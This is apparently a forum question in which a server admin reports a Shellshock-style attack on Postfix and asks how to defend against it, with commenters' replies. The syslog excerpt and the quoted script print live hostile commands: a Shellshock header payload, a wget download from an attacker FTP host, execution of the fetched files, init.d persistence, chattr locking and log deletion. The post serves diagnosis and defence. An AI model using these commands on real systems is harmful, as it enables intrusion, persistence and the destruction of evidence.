# Strange hack attempt to postfix

Tags: security, postfix, hacking

Yesterday I got a email sent {@DOMAIN.ORG from my mailserver the mail was marked as spam.

The body included scripts download commands like ftp://ftp.ugotownedz.org/upfile2.sh

**lines from syslog**

```
Aug 14 19:25:00 hoeschen-vserv postfix/smtpd[20965]: connect from pacific1392.us.unmetered.com[209.239.123.82]
Aug 14 19:25:01 hoeschen-vserv postfix/smtpd[20965]: 25B9ADC1075: client=pacific1392.us.unmetered.com[209.239.123.82]
Aug 14 19:25:02 hoeschen-vserv postfix/cleanup[20969]: 25B9ADC1075: message-id=() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O ... -rf /root/.bash_history; rm -rf /var/log/*"
```

In fact this very simple un-encrypted shell script tries to establish a trojan. To me, it looks rather dirty and it was unsuccessful.

But anyway, is there anything I can do to protect `postfix` against those types of hacks?

**From the script**

```
...
echo sshdo.ico >> /tmp/upfile
for file in $(cat /tmp/upfile); do killall $file; ls /tmp/.udp/$file || wget ftp://$1/$file -O /tmp/.udp/$file; chmod +x /tmp/.udp/$file; /tmp/.udp/$file; perl /tmp/.udp/Xorg; perl /tmp/.udp/crun.d ; php /tmp/.udp/sshdo.ico; php sshdo.ico; rm -rf /tmp/.udp/sshdo.ico /tmp/.udp/crun.d /tmp/.udp/Xorg ; done
...
for file6 in $(cat /tmp/upfile); do cp /tmp/.udp/$file6 /etc/init.d/$file6;cp /tmp/.udp/$file6 /etc/init.d/$file6; chmod +x /etc/init.d/$file6; sudo update-rc.d $file6 defaults ; done
...
chattr +i /tmp/.udp/*
rm -rf /var/log/*
```

Comment: http://serverfault.com/q/749081/126632

Comment: It looks like that "attempt" had no chance of success

Comment: "anything I can do to protect postfix against those types of hacks?" -- disconnect it from the Internet.  That's the only way to stop anyone from attempting to compromise a system.

Comment: That ftp site is still live, so I would block it from the rest of your hosts until you know what the attack vector was and have remediated.  You should block outbound traffic anyway, or use the iptables module `owner` to limit outbound connections to specific users, groups and destinations.